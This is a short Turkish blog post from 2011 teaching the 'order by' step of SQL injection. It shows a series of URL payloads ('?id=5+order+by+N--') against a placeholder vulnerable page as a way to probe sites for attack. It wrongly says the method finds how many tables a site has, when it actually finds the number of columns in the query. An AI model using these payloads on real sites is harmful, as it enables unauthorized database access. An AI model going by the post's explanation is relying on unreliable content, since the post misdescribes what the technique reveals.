Sql açığını bulduktan sonra yapılacak ilk iş sitenin "table" sayısını bulmaktır. Order by komutu table bulmak için kullanılır. Hemen örnekle gösterelim:
orneksite.com/ders.php?id=5 açığı bulduğumuz link. Hemen order by komutunu kullanalım.
orneksite.com/ders.php?id=5+order+by+1-- bu kodu yazdıktan sonra sitede hata yoktur. Çünkü her sitede en az bir table vardır. "--" bu çift tire ise adres çubuğuna yazdığımız kodun sql tarafından gönderildiğini belirtir. Hata alana kadar sayımızı büyütelim.
orneksite.com/ders.php?id=5+order+by+2-- hata yok..
orneksite.com/ders.php?id=5+order+by+3-- hata yok..
orneksite.com/ders.php?id=5+order+by+4-- hata yok..
orneksite.com/ders.php?id=5+order+by+5-- diyelim ki 5'de hata aldık. Demek ki table 4 tane. Yani hata aldığımız sayının 1 eksiği. Sql injectionda "Order by" komutunun işlevi budur.
5 Mayıs 2011 Perşembe
Sql İnjection "Order By" Komutu
Gönderen Admin zaman: 17:46 Etiketler: Order by, Sql İnjection, sql injectionda order by komutu
Kaydol:
Kayıt Yorumları (Atom)
1 yorum:
Çok teşekkürler...
Yorum Gönder